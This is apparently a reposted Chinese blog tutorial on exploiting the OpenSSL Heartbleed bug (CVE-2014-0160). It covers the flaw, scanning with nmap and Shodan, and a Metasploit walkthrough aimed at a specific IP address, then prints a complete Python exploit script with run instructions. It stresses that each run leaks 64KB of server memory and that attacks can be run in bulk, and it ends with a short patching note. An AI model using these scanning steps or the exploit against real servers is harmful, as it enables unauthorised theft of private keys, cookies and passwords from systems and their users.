當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

心脏出血漏洞利用

發(fā)布時間：2023/12/14 编程问答 54 豆豆

生活随笔收集整理的這篇文章主要介紹了心脏出血漏洞利用小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

0x0引言~

心臟出血（英語：Heartbleed），也簡稱為心血漏洞，是一個出現(xiàn)在加密程序庫OpenSSL的安全漏洞，該程序庫廣泛用于實現(xiàn)互聯(lián)網(wǎng)的傳輸層安全（TLS）協(xié)議。它于2012年被引入了軟件中，2014年4月首次向公眾披露。只要使用的是存在缺陷的OpenSSL實例，無論是服務器還是客戶端，都可能因此而受到攻擊。此問題的原因是在實現(xiàn)TLS的心跳擴展時沒有對輸入進行適當驗證（缺少邊界檢查），因此漏洞的名稱來源于“心跳”（heartbeat）。該程序錯誤屬于緩沖區(qū)過讀，即可以讀取的數(shù)據(jù)比應該允許讀取的還多。

文章目錄

漏洞詳情
- 漏洞描述
- 漏洞范圍
- 漏洞成因
- 漏洞危害
漏洞探測
- nmap探測
- 專屬工具探測
- 搜索引擎探測
實戰(zhàn)利用
- msf利用
- EXP利用
修補方案

一、漏洞詳情

一、漏洞描述

在OpenSSL1.0.1版本中存在嚴重漏洞（CVE-2014-0160），此次漏洞問題存在于ssl/dl_both.c文件中。OpenSSL Heartbleed模塊存在一個BUG，當攻擊者構造一個特殊的數(shù)據(jù)包，滿足用戶心跳包中無法提供足夠多的數(shù)據(jù)會導致memcpy把SSLv3記錄之后的數(shù)據(jù)直接輸出，該漏洞導致攻擊者可以遠程讀取存在漏洞版本的openssl服務器內(nèi)存中64K的數(shù)據(jù)，該漏洞主要存在與OpenSSL的1.0.1版本到1.0.1f版本

二、漏洞范圍

該漏洞主要存在于OpenSSL以下版本：
1.OpenSSL 1.0.2-beta
2.OpenSSL 1.0.1 - OpenSSL 1.0.1f

三、漏洞成因

Heartbleed漏洞，這項嚴重缺陷(CVE-2014-0160)的產(chǎn)生是由于未能在memcpy()調(diào)用受害用戶輸入內(nèi)容作為長度參數(shù)之前正確進行邊界檢查。攻擊者可以追蹤OpenSSL所分配的64KB緩存、將超出必要范圍的字節(jié)信息復制到緩存當中再返回緩存內(nèi)容，這樣一來受害者的內(nèi)存內(nèi)容就會以每次64KB的速度進行泄露

四、漏洞危害

該漏洞具有隨機性，攻擊者可通過該漏洞讀取網(wǎng)絡服務器內(nèi)存中的敏感數(shù)據(jù)信息（每次利用該漏洞可讀取目標的64K敏感信息），只要有足夠的耐心和時間，就可以翻檢足夠多的數(shù)據(jù)，拼湊出戶主的銀行密碼、私信等敏感數(shù)據(jù)，利用該漏洞可以獲取到服務器的私鑰，用戶cookie和賬號密碼等

漏洞探測

一、nmap探測

nmap.exe -sV -p443 --script ssl-heartbleed.nse -v ip/域名

通過nmap反饋結果可以看出目標存在心臟滴血漏洞

二、專屬工具探測（推薦）

工具傳送門：https://pan.baidu.com/s/11Y7A7USLlS9l_dxsrHvbcg
提取碼：jcaz

三、搜索引擎探測

可利用shodan進行全網(wǎng)探測

openssl/1.0.1a

實戰(zhàn)利用

一、msf利用

1.命令行輸入 search openssl 查看關于openssl的漏洞模塊

root@kali:~# msfconsole msf5 > search openssl

可以看到有auxiliary（輔助）模塊和exploit（攻擊）模塊，而我們現(xiàn)在要使用的是模塊4，用來進行對Heartbleed的漏洞利用

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options

需要設置的options：

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts ip rhosts => 37.18.75.111 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 端口 rport => 443 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true verbose => true msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

每次exploit 可獲取64K信息，只要有足夠的耐心和時間，就可以翻檢足夠多的數(shù)據(jù)，拼湊出用戶的各類信息，雖然此漏洞存在隨機性，但是實現(xiàn)方法簡易快捷，可批量攻擊，故存在較高的危險性

二、EXP利用

完整的exp：

import sys import struct import socket import time import select import re from optparse import OptionParseroptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')def h2bin(x):return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''')hb = h2bin(''' 18 03 02 00 03 01 40 00 ''')def hexdump(s):for b in xrange(0, len(s), 16):lin = [c for c in s[b : b + 16]]hxdat = ' '.join('%02X' % ord(c) for c in lin)pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)print ' %04x: %-48s %s' % (b, hxdat, pdat)printdef recvall(s, length, timeout=4):endtime = time.time() + timeoutrdata = ''remain = lengthwhile remain > 0:rtime = endtime - time.time()if rtime < 0:return Noner, w, e = select.select([s], [], [], 5)if s in r:data = s.recv(remain)# EOF?if not data:return Nonerdata += dataremain -= len(data)return rdatadef recvmsg(s):hdr = recvall(s, 5)if hdr is None:print 'Unexpected EOF receiving record header - server closed connection'return None, None, Nonetyp, ver, ln = struct.unpack('>BHH', hdr)pay = recvall(s, ln, 10)if pay is None:print 'Unexpected EOF receiving record payload - server closed connection'return None, None, Noneprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))return typ, ver, paydef hit_hb(s):s.send(hb)while True:typ, ver, pay = recvmsg(s)if typ is None:print 'No heartbeat response received, server likely not vulnerable'return Falseif typ == 24:print 'Received heartbeat response:'hexdump(pay)if len(pay) > 3:print 'WARNING: server returned more data than it should - server is vulnerable!'else:print 'Server processed malformed heartbeat, but did not return any extra data.'return Trueif typ == 21:print 'Received alert:'hexdump(pay)print 'Server returned error, likely not vulnerable'return FalseBUFSIZ = 1024def main():opts, args = options.parse_args()if len(args) < 1:options.print_help()returns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print 'Connecting...'s.connect((args[0], opts.port))if opts.starttls != '':print 'Sending STARTTLS Protocol Command...'if opts.starttls == 'smtp':s.recv(BUFSIZ)s.send("EHLO openssl.client.net\n")s.recv(BUFSIZ)s.send("STARTTLS\n")s.recv(BUFSIZ)if opts.starttls == 'pop3':s.recv(BUFSIZ)s.send("STLS\n")s.recv(BUFSIZ)if opts.starttls == 'imap':s.recv(BUFSIZ)s.send("STARTTLS\n")s.recv(BUFSIZ)if opts.starttls == 'ftp':s.recv(BUFSIZ)s.send("AUTH TLS\n")s.recv(BUFSIZ)if opts.starttls == 'xmpp': # TODO: This needs SASLs.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")s.recv(BUFSIZ)print 'Sending Client Hello...'s.send(hello)print 'Waiting for Server Hello...'while True:typ, ver, pay = recvmsg(s)if typ == None:print 'Server closed connection without sending Server Hello.'return# Look for server hello done message.if typ == 22 and ord(pay[0]) == 0x0E:breakprint 'Sending heartbeat request...'sys.stdout.flush()s.send(hb)hit_hb(s)if __name__ == '__main__':main()

exp利用方式：python+exp.py+ip/域名

注：每次使用exp可獲取64k敏感數(shù)據(jù)

修補方案

要解決此漏洞，建議服務器管理員或使用1.0.1g版，或使用-DOPENSSL_NO_HEARTBEATS選項重新編譯OpenSSL，從而禁用易受攻擊的功能，直至可以更新服務器軟件

總結

以上是生活随笔為你收集整理的心脏出血漏洞利用的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： lower_bound,upper_bo
下一篇： STM32H743必要外围电路分析